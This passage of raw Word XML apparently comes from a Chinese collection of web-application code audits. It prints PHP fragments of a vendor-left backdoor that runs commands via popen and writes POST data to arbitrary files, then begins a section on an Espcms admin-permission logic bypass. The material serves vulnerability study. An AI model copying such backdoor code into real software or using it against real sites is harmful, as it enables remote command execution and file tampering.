            <v:rect id="_x0000_s8902" style="position:absolute;left:3561;top:11142;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8901" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8900" type="#_x0000_t75" style="position:absolute;left:1797;top:11468;width:520;height:200">
              <v:imagedata r:id="rId60" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s8899" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8898" type="#_x0000_t75" style="position:absolute;left:1797;top:11794;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s8897" style="position:absolute;left:2197;top:11794;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8896" style="position:absolute;left:2679;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8895" style="position:absolute;left:2799;top:11794;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8894" style="position:absolute;left:4607;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8893" style="position:absolute;left:4727;top:11794;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8892" style="position:absolute;left:5691;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8891" style="position:absolute;left:5812;top:11794;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8890" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8889" type="#_x0000_t75" style="position:absolute;left:1797;top:12120;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s8888" style="position:absolute;left:2197;top:12120;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8887" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8886" style="position:absolute;left:1797;top:12446;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pic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884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ed="f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2012" w:right="1946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"file no found\n"; exit(0);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str</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = "";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>! feof($fp)){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 xml:space="preserve">$s = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>htmlspecialchars(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>fgets($fp));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012" w:right="379"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$s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"\n", "&lt;br/&gt;", $s); if ($s == "\n") continue;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2012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 xml:space="preserve">str </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> " ".$s;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095" w:right="1296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iconv("gb2312", "utf-8", $str); exit(0);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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($type == "viget"){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="579" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$ds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 ', $cmd);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579" w:right="3379"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$fp = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>popen(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$cmd, "r"); if (!$fp){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="215" w:lineRule="exact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"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>命令执行失败</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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exit(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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 w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="980" w:right="728" w:hanging="401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(is_file($ds[1]) &amp;&amp; !file_exists($ds[1])){ echo "file no found\n";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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exit(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>0);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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579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str</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> = "";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124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>! feof($fp)){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$s = (</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>fgets(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$fp));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($s == "\n") continue;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str .=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> $s;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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579" w:right="1812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iconv("gb2312", "utf-8", $str); exit(0);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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8801" style="width:337.75pt;height:263pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,5260">
            <v:rect id="_x0000_s8883" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8882" style="position:absolute;left:185;top:248;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8881" style="position:absolute;left:426;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8880" style="position:absolute;left:546;top:248;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8879" style="position:absolute;left:1269;top:248;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8878" style="position:absolute;left:1390;top:248;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8877" style="position:absolute;left:1631;top:248;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8876" style="position:absolute;left:1751;top:248;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8875" style="position:absolute;left:5;top:511;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8874" type="#_x0000_t75" style="position:absolute;left:185;top:574;width:400;height:200">
              <v:imagedata r:id="rId37" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s8873" style="position:absolute;left:585;top:574;width:482;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8872" style="position:absolute;left:1067;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8871" style="position:absolute;left:1187;top:574;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8870" style="position:absolute;left:1308;top:574;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8869" style="position:absolute;left:1428;top:574;width:3013;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8868" style="position:absolute;left:5;top:837;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8867" style="position:absolute;left:185;top:900;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8866" style="position:absolute;left:1101;top:900;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8865" style="position:absolute;left:1342;top:900;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8864" style="position:absolute;left:1462;top:900;width:2049;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8863" style="position:absolute;left:5;top:1163;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8862" style="position:absolute;left:185;top:1196;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8861" style="position:absolute;left:1101;top:1196;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8860" style="position:absolute;left:2017;top:1196;width:482;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8859" style="position:absolute;left:2499;top:1196;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8858" style="position:absolute;left:2619;top:1196;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8857" style="position:absolute;left:2740;top:1196;width:1400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8856" style="position:absolute;left:4140;top:1196;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8855" style="position:absolute;left:5;top:1489;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8854" style="position:absolute;left:185;top:1552;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8853" style="position:absolute;left:1101;top:1552;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8852" style="position:absolute;left:2017;top:1552;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8851" style="position:absolute;left:5;top:1815;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8850" style="position:absolute;left:185;top:1878;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8849" style="position:absolute;left:1101;top:1878;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8848" style="position:absolute;left:5;top:2141;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8847" style="position:absolute;left:185;top:2204;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8846" style="position:absolute;left:1101;top:2204;width:361;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8845" style="position:absolute;left:1462;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8844" style="position:absolute;left:1583;top:2204;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8843" style="position:absolute;left:1703;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8842" style="position:absolute;left:1824;top:2204;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8841" style="position:absolute;left:3149;top:2204;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8840" style="position:absolute;left:3270;top:2204;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8839" style="position:absolute;left:5;top:2467;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8838" style="position:absolute;left:185;top:2530;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8837" style="position:absolute;left:1101;top:2530;width:241;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8836" style="position:absolute;left:1342;top:2530;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8835" style="position:absolute;left:1462;top:2530;width:844;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8834" style="position:absolute;left:5;top:2793;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8833" style="position:absolute;left:185;top:2826;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8832" style="position:absolute;left:1101;top:2826;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8831" style="position:absolute;left:2017;top:2826;width:482;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8830" style="position:absolute;left:2499;top:2826;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8829" style="position:absolute;left:2619;top:2826;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8828" style="position:absolute;left:2740;top:2826;width:1200;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8827" style="position:absolute;left:3940;top:2826;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8826" style="position:absolute;left:5;top:3119;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8825" style="position:absolute;left:185;top:3182;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8824" style="position:absolute;left:1101;top:3182;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8823" style="position:absolute;left:2017;top:3182;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8822" style="position:absolute;left:5;top:3445;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8821" style="position:absolute;left:185;top:3508;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8820" style="position:absolute;left:1101;top:3508;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8819" style="position:absolute;left:5;top:3771;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8818" style="position:absolute;left:185;top:3834;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8817" style="position:absolute;left:1101;top:3834;width:1325;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8816" style="position:absolute;left:2426;top:3834;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8815" style="position:absolute;left:2547;top:3834;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8814" style="position:absolute;left:5;top:4097;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8813" style="position:absolute;left:185;top:4160;width:916;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8812" style="position:absolute;left:1101;top:4160;width:1446;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8811" style="position:absolute;left:5;top:4423;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8810" style="position:absolute;left:185;top:4456;width:916;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8809" style="position:absolute;left:1101;top:4456;width:482;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8808" style="position:absolute;left:1583;top:4456;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8807" style="position:absolute;left:1703;top:4456;width:121;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8806" style="position:absolute;left:1824;top:4456;width:800;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8805" style="position:absolute;left:2624;top:4456;width:241;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8804" style="position:absolute;left:5;top:4749;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8803" style="position:absolute;left:185;top:4812;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s8802" type="#_x0000_t202" style="position:absolute;left:3;top:3;width:6750;height:5255" filled="f" strokecolor="#ccc" strokeweight=".24pt">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                    <w:pPr>
                      <w:spacing w:before="2"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Times New Roman"/>
                        <w:sz w:val="21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($type == "save"){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126" w:line="388" w:lineRule="auto"/>
                      <w:ind w:left="1095" w:right="2294" w:hanging="516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$con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urldecode(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$_POST['con']); if (!is_file($cmd)){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="217" w:lineRule="exact"/>
                      <w:ind w:left="2012" w:right="50"/>
                      <w:rPr>
                        <w:sz w:val="20"/>
                        <w:lang w:eastAsia="zh-CN"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                        <w:lang w:eastAsia="zh-CN"/>
                      </w:rPr>
                      <w:t>echo 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  <w:lang w:eastAsia="zh-CN"/>
                      </w:rPr>
                      <w:t>该文件不可编辑</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                        <w:lang w:eastAsia="zh-CN"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="2012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0);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="1095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 w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="1095" w:right="2863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$fp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fopen(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$cmd, "w"); if (!$fp){</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="212" w:lineRule="exact"/>
                      <w:ind w:left="2012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打开文件失败</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112"/>
                      <w:ind w:left="2012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0);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="126"/>
                      <w:ind w:left="1095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 w:line="391" w:lineRule="auto"/>
                      <w:ind w:left="1095" w:right="3465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fwrite(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$fp, $con); fclose($fp);</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:line="212" w:lineRule="exact"/>
                      <w:ind w:left="1095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操作成功</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:color w:val="333333"/>
                        <w:sz w:val="20"/>
                      </w:rPr>
                      <w:t>";</w:t>
                    </w:r>
                  </w:p>
                  <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                    <w:pPr>
                      <w:spacing w:before="112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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="38" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317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w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个也没什么好说的，官方自己留的命令执行、文件读写后门，以命令执</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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行为例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="9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5224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105203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3780286" cy="2273617"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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86" cy="2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292EF3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="9"/>
          <w:lang w:eastAsia="zh-C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8"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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10"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="540" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="逻辑错误"/>
      <w:bookmarkStart w:id="62" w:name="Espcms后台逻辑验证错误漏洞"/>
      <w:bookmarkStart w:id="63" w:name="_bookmark29"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>逻辑错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="43"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Espcms </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后台逻辑验证错误漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="316" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Code_Sec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>系统后台权限逻辑校验存在问题，导致后台某模块功能被绕过</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和非授</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:w w:val="95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权访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:line="247" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后台管理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>员权</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限校</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
